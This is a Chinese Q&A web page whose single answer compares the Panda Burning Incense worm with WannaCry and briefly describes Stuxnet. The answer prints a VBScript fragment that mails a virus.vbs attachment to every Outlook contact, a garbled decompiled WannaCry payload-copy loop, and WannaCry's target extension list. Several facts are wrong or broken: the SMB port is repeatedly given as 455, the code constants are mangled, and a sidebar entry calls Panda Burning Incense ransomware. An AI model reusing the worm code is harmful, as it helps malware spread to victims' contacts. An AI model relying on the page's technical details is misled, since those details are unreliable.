问答1 问答5 问答50 问答500 问答1000
网友互助专业问答平台

电脑病毒比拼,比特币和熊猫烧香有哪些相似与不同?

提问网友 发布时间:2022-03-30 03:22
声明:本网页内容为用户发布,旨在传播知识,若有侵权等问题请及时与本网联系,我们将在第一时间删除处理。
E-MAIL:1656858193@qq.com
1个回答
热心网友 回答时间:2022-03-30 04:51

近年来的病毒,这里特指蠕虫病毒。

Stuxnet蠕虫,MS10-061,当蠕虫值入机器后,把自己设置成开机自启动,并释放驱动文件,把该驱动设置为服务自启动。该驱动负责突破系统TCP半开连接数*,以方便蠕虫通过网络传播。感染系统的可移动驱动器(即U盘等),可通过U盘传播自身。通过MS10-061打印机服务远程代码执行漏洞在局域网传播自身。并尝试利用一些弱口令企图猜解并取得主机权限,危及整个网络的安全。为计算机设置了一个后门,不断尝试连接远程黑客服务器,收集用户信息,接收黑客指令,并可获取黑客远程服务器木马并执行,带来严重安全隐患。

熊猫烧香对我来说有点久远,虽然我有初始的蠕虫病毒,但没有解析关键的代码,只从网络中找到说是变了50次的变种一部分。

 Set objOA=Wscript.CreateObject("Outlook.Application")

创建一个OUTLOOK应用的对象

Set objMapi=objOA.GetNameSpace("MAPI")

取得MAPI名字空间 For i=1 to objMapi.AddressLists.Count  遍历地址簿

 Set objAddList=objMapi.AddressLists(i)For j=1 To objAddList. AddressEntries.Count  

Set objMail=objOA.CreateItem (0)objMail.Recipients.Add (objAddList. AddressEntries (j)

取得收件人邮件地址

 objMail.Subject=" 你好!"  

设置邮件主题

objMail.Body="这次给你的附件,是我的新文档!"  

设置信件内容

objMail.Attachments.Add(“c:virus.vbs")

把自己作为附件扩散出去

objMail.Send  

发送邮件

Next  

Next  

Set objMapi=Nothing  

Set objOA=Nothing  

这块是源码的传播方式,其实是劫持了邮箱的账号密码,自动发送邮件给好友,其实附件带的就是病毒复制体了。与最近的比特币病毒相关的也只有在局域网中通过455端口迅速感染。

它的感染方式主要是通过下载,病毒会删除ghost文件,并对文档的图片进行更换,不会对文件造成损坏。

而比特币病毒不同。

WannaCry木马利用泄漏的方程式工具包中的“永恒之蓝”漏洞工具从MS17_010漏洞进行网络端口(455端口)扫描攻击,目标机器被成功攻陷后会从攻击机下载WannaCry木马进行感染,并作为攻击机再次扫描互联网和局域网其他机器,行成蠕虫感染大范围超快速扩散。

木马母体为mssecsvc.exe,运行后会扫描随机ip的互联网机器,尝试感染,也会扫描局域网相同网段的机器进行感染传播,此外会释放敲诈者程序tasksche.exe,对磁盘文件进行加密勒索。

V1=0;

Do

{

P_payload=&payload_x86;

If(v1)

P_payload=&payload_x64;

V3=*(void **)&FileName[4*v1=260];

(&v11+v1)=(int)v3;

memcpy(v3,p_payload,v1!=0?51364:16480);

*(&v11+v1)+=v1!=0?513634:16480;

++v1

}

While(v1<2);

V4+CreateFileA(FileName,0*8000000u,1u,03u,4u,0);

这个就是利用MS17_010的数据了,这个锅只能背给不更新补丁的人了。

木马加密使用AES加密文件,并使用非对称加密算法RSA 2048加密随机密钥,每个文件使用一个随机密钥,下面就是密码学的概率了,就和当初二战时期德军的恩尼格玛密码机一样,每一天的密码算法是天文数字,除非得到密钥,其余不可能破解。

熊猫烧香是不会损害文件的,但这个是可以的。

.doc, .docx, .xls, .xlsx, .ppt, .pptx, .pst, .ost, .msg, .eml, .vsd, .vsdx, .txt, .csv, .rtf, .123, .wks, .wk1, .pdf, .dwg, .onetoc2, .snt, .jpeg, .jpg, .docb, .docm, .dot, .dotm, .dotx, .xlsm, .xlsb, .xlw, .xlt, .xlm, .xlc, .xltx, .xltm, .pptm, .pot, .pps, .ppsm, .ppsx, .ppam, .potx, .potm, .edb, .hwp, .602, .sxi, .sti, .sldx, .sldm, .sldm, .vdi, .vmdk, .vmx, .gpg, .aes, .ARC, .PAQ, .bz2, .tbk, .bak, .tar, .tgz, .gz, .7z, .rar, .zip, .backup, .iso, .vcd, .bmp, .png, .gif, .raw, .cgm, .tif, .tiff, .nef, .psd, .ai, .svg, .djvu, .m4u, .m3u, .mid, .wma, .flv, .3g2, .mkv, .3gp, .mp4, .mov, .avi, .asf, .mpeg, .vob, .mpg, .wmv, .fla, .swf, .wav, .mp3, .sh, .class, .jar, .java, .rb, .asp, .php, .jsp, .brd, .sch, .dch, .dip, .pl, .vb, .vbs, .ps1, .bat, .cmd, .js, .asm, .h, .pas, .cpp, .c, .cs, .suo, .sln, .ldf, .mdf, .ibd, .myi, .myd, .frm, .odb, .dbf, .db, .mdb, .accdb, .sql, .sqlitedb, .sqlite3, .asc, .lay6, .lay, .mml, .sxm, .otg, .odg, .uop, .std, .sxd, .otp, .odp, .wb2, .slk, .dif, .stc, .sxc, .ots, .ods, .3dm, .max, .3ds, .uot, .stw, .sxw, .ott, .odt, .pem, .p12, .csr, .crt, .key, .pfx, .der

这些都是病毒会攻击的文档后缀。

和熊猫不同的是,它会通过tor匿名,监听9050端口,通过本地代理通信实现与服务器连接。

本文如未解决您的问题请添加抖音号:51dongshi(抖音搜索懂视),直接咨询即可。

相关推荐
  • 熊猫烧香是勒索病毒吗

    熊猫烧香是勒索病毒吗

    熊猫烧香是勒索病毒。熊猫烧香,跟灰鸽子不同,是一款拥有自动传播、自动感染硬盘能力和强大的破坏能力的病毒,它不但能感染系统中exe,com,pif,src,html,asp等文件,它还能中止大量的反病毒软件进程并且会删除扩展名为gho的文
    查看详情
如何在微信里拍拍好友 一个人如何为自己拍出全身照(半身照)定时拍照试过吗 明星的这种全身照一般是怎么拍的? 用手机自拍怎样把全身都照下来 影棚拍全身照最少得多少距离? 这种全身照照片是怎么拍出来的? 全身照怎么拍好看 全身照怎么拍出来的 拍全身照怎么那么丑 拍全身照什么镜头好 有没有一个P图的工具能把照片变瘦?? 手机拍照下载什么应用程序可以照全身? 拍全身照让腿变长的是什么软件 请问是什么 手机怎么自己可以把自己进行全身体照相? 拍照软件推荐 用什么手机软件可以自己拍出全身照啊,求大神解答! 电脑插好了网线后无法连接到Internet 笔记本电脑插网线明明有网络却显示没网络? 新电脑插了网线连不上网 当年的熊猫烧香病毒和现如今勒索病毒谁更 熊猫烧香和勒索病毒的异同及对网络商务的警示分析 剪映里面的视频发布抖音会和别人一样吗 抖音里面的剪影在哪里 抖音剪映里那些动物边跳边唱是怎样剪辑的? 如何在打游戏的时候把消息变成弹幕? 华为手机怎么开启弹幕消息 梅艳芳是因为什么原因去世的? 华为手机弹幕设置在哪里 华为手机玩游戏时消息变弹幕 折多山实时摄像头监控在哪里看 为什么华为手机不弹消息 华为荣耀9弹幕怎么关 华为p9怎样关闭弹幕广告 华为荣耀8x手机弹幕通知怎么设置? 华为荣耀50 pro显示黑字幕怎样调节 微信帐号密码号是多少 微信可用手机号码注册,忘记密码怎么办? 注册微信账号和密码 新注册的忘记密码,也没绑定银行卡加的好友,好友验证都失败了微信里有好多钱呢急急急
Top